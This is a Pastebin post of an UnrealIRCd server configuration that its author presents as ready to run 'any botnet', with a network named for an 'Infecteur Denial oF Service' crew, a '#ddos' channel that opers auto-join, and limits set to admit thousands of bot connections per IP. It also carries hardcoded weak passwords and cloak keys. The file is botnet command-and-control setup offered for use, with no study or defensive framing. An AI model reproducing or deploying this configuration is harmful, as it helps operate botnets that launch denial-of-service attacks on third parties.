Advertisement
Infecteur

Unrealircd

Feb 4th, 2012
317
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
mIRC 5.30 KB | None | 0 0
  1. ##########Unrealircd Config By Infecteur######################
  2. ##                                                          ##
  3. ##                  Unrealircd.conf                         ##
  4. ##  This Config will work with any botnet  with no pb..     ##
  5. ##############################################################
  6. loadmodule "src/modules/commands.so";
  7. loadmodule "src/modules/cloak.so";
  8.  
  9.  
  10. include "help.conf";
  11. include "badwords.channel.conf";
  12. include "badwords.message.conf";
  13. include "badwords.quit.conf";
  14. include "dccallow.conf";
  15.  
  16. set {
  17.     network-name "IRC-Infecteur-Team";
  18.     services-server "services.Yourserver.com";
  19.     stats-server "Stats.Yourserver.com";
  20.     default-server "irc.Yourserver.com";
  21.     default-bantime 1d;
  22.     help-channel "#ddos";
  23.     hiddenhost-prefix "*";
  24.     prefix-quit "Quit:";
  25.     cloak-keys {
  26.         "4234jrgtg2Hdfghdfjs2gjQQHGkish";
  27.         "sdft3ormsdgsdEygaH256lfEhjg35f";
  28.         "h12308fDd34FaFerawTrOwQgfg6hfs";
  29.     };
  30.     hosts {
  31.         local "Local.Yourserver.com";
  32.         global "Global.Yourserver.com";
  33.         coadmin "CoAdmin.Yourserver.com";
  34.         admin "ServerAdmin.Yourserver.com";
  35.         servicesadmin "ServicesAdmin.Yourserver.com";
  36.         netadmin "NetworkAdmin.Yourserver.com";
  37.         host-on-oper-up "yes";
  38.     };
  39.  
  40. }
  41. set {
  42.     kline-address    "anythink@camfrog.com";
  43.     modes-on-connect "+x";
  44.     modes-on-oper    "+xwg";
  45.     restrict-usermodes "G";
  46.     restrict-channelmodes "G";
  47.     modes-on-join "+nt";
  48.  
  49.     oper-auto-join "#ddos";
  50.    
  51.     dns {
  52.         nameserver 127.0.0.1;
  53.         timeout 200000s;
  54.         retries 1;
  55.     };
  56.     options {
  57.         show-connect-info;
  58.     };
  59.     maxchannelsperuser 100;
  60.     static-quit "Client says Byees";   
  61.     oper-only-stats "*";
  62.  
  63.     throttle {
  64.         connections 127;
  65.         period 1s;
  66.     };
  67.  
  68. };
  69.  
  70. me {
  71.     name "Infecteur.FLood";
  72.     info "Infecteur Denial oF Service";
  73.     numeric 6;
  74. };
  75.  
  76.  
  77. admin {
  78.         "Infecteur";
  79.         "Infecteur    -   Infecteur@gmail.com";
  80.  
  81. };
  82.  
  83. tld {  
  84.     mask *@*;
  85.     motd "motd.conf";
  86.     rules "rules.conf";
  87. };
  88.  
  89.  
  90. drpass {
  91.         restart "restart123";
  92.         die "dei123";
  93. };
  94.  
  95. log ircd.log {
  96.     maxsize 5MB;
  97.     flags {
  98.         errors;
  99.         kills;
  100.         sadmin-commands;
  101.         chg-commands;
  102.         oper-override;
  103.         kline;
  104.         tkl;
  105.     };
  106. };
  107.  
  108. listen         *:6000;
  109.  
  110. class           clients
  111. {
  112.         pingfreq 600;
  113.         maxclients 12000;
  114.         sendq 100000000;
  115.         recvq 8000;
  116. };
  117.  
  118. class           servers
  119. {
  120.         pingfreq 600;
  121.         maxclients 12000;
  122.         sendq 100000000;
  123.         connfreq 8000;
  124. };
  125.  
  126. allow {
  127.     ip *@*;
  128.     hostname *@*;
  129.     class clients;
  130.     maxperip 10000;
  131. };
  132.  
  133. ulines {
  134.         Yourserver.com;
  135. };
  136.  
  137. link            Yourserver.com
  138. {
  139.         username        *;
  140.         hostname        Yourserver.com;
  141.         bind-ip         *;
  142.         port            6667;
  143.         hub             *;
  144.         password-connect "passw0rd";
  145.         password-receive "passw0rd";
  146.         class servers;
  147. };
  148.  
  149. oper Infecteur {
  150.         class           clients;
  151.         from {
  152.                 userhost *@*;
  153.         };
  154.         password "Dick";
  155.         flags
  156.         {
  157.                 global;
  158.                 services-admin;
  159.                 can_rehash;
  160.                 can_die;
  161.                 can_restart;
  162.                 helpop;
  163.                 can_wallops;
  164.                 can_globops;
  165.                 can_localroute;
  166.                 can_globalroute;
  167.                 can_localkill;
  168.                 can_globalkill;
  169.                 can_kline;
  170.                 can_gzline;
  171.                 can_gkline;
  172.                 can_unkline;
  173.                 can_localnotice;
  174.                 can_globalnotice;
  175.                 netadmin;
  176.                 can_zline;
  177.                 get_umodew;
  178.                 get_host;
  179.                 can_override;
  180.     };
  181.     snomask *;
  182.     maxlogins "100";
  183. };
  184.  
  185. allow           channel {
  186.     channel "#ddos";
  187. };
  188.  
  189. ban nick {
  190.     mask "*S*e*r*v*";
  191.     reason "Gesperrt";
  192. };
  193.  
  194. alias "services" {
  195.     format "^#" {
  196.         nick "ChanServ";
  197.         type services;
  198.         parameters "%1-";
  199.     };
  200.     format "^[^#]" {
  201.         nick "NickServ";
  202.         type services;
  203.         parameters "%1-";
  204.     };
  205.     type command;
  206. };
  207.  
  208. alias "identify" {
  209.     format "^#" {
  210.         nick "ChanServ";
  211.         type services;
  212.         parameters "IDENTIFY %1-";
  213.     };
  214.     format "^[^#]" {
  215.         nick "NickServ";
  216.         type services;
  217.         parameters "IDENTIFY %1-";
  218.     };
  219.     type command;
  220. };
  221.  
  222. alias "ChanServ" {
  223.     nick "ChanServ";
  224.     type services;
  225. };
  226.  
  227. alias "cs" {
  228.     nick "ChanServ";
  229.     type services;
  230. };
  231.  
  232. alias "NickServ" {
  233.     nick "NickServ";
  234.     type services;
  235. };
  236.  
  237. alias "ns" {
  238.     nick "NickServ";
  239.     type services;
  240. };
  241.  
  242. alias "BotServ" {
  243.     nick "BotServ";
  244.     type services;
  245. };
  246.  
  247. alias "bs" {
  248.     nick "BotServ";
  249.     type services;
  250. };
  251.  
  252. alias "HelpServ" {
  253.     nick "HelpServ";
  254.     type services;
  255. };
  256.  
  257. alias "he" {
  258.     nick "HelpServ";
  259.     type services;
  260. };
  261.  
  262. alias "OperServ" {
  263.     nick "OperServ";
  264.     type services;
  265. };
  266.  
  267. alias "os" {
  268.     nick "OperServ";
  269.     type services;
  270. };
  271.  
  272. alias "MemoServ" {
  273.     nick "MemoServ";
  274.     type services;
  275. };
  276.  
  277. alias "ms" {
  278.     nick "MemoServ";
  279.     type services;
  280. };
  281.  
  282. alias "HostServ" {
  283.     nick "HostServ";
  284.     type services;
  285. };
  286.  
  287. alias "hs" {
  288.     nick "HostServ";
  289.     type services;
  290. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement